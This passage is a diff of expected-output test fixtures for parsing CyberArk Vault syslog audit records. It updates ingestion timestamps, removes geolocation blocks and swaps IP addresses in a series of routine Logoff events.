00:28:29\",\"IsoTimestamp\":\"2021-03-10T08:28:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904221400Z", + "ingested": "2021-12-09T13:37:11.641122300Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904222700Z", + "ingested": "2021-12-09T13:37:11.641127700Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -409,20 +409,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -442,7 +430,7 @@ "Administrator" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -450,7 +438,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:33Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -463,8 +451,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904223900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641133Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -488,20 +476,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -521,7 +497,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -529,7 +505,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:12:20Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logoff", "message": "Logoff", "issuer": "PSMP_ADB_localhost.localdomain", @@ -542,8 +518,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904225200Z", - "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641136800Z", + "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -567,20 +543,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -600,7 +564,7 @@ "PSMPGW_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -608,7 +572,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:12:27Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logoff", "message": "Logoff", "issuer": "PSMPGW_localhost.localdomain", @@ -621,8 +585,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904226400Z", - "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641141200Z", + "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -646,19 +610,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -678,7 +631,7 @@ "Administrator" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -686,7 +639,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:17:27Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -699,8 +652,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904256400Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:11.641146500Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -724,20 +677,8 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "127.0.0.1", @@ -765,7 +706,7 @@ ], "ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -773,9 +714,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:13Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "127.0.0.1", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -788,8 +729,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904258500Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:37:11.641151100Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", "action": "logoff", @@ -813,20 +754,8 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "10.0.2.2", @@ -854,7 +783,7 @@ ], "ip": [ "10.0.2.2", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -862,9 +791,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:48:28Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "10.0.2.2", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e8\u003c/MessageID\u003e\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eLogoff\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eLogoff\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Logoff", "message": "Logoff", "issuer": "Administrator", @@ -877,8 +806,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.904260500Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:37:11.641154800Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n 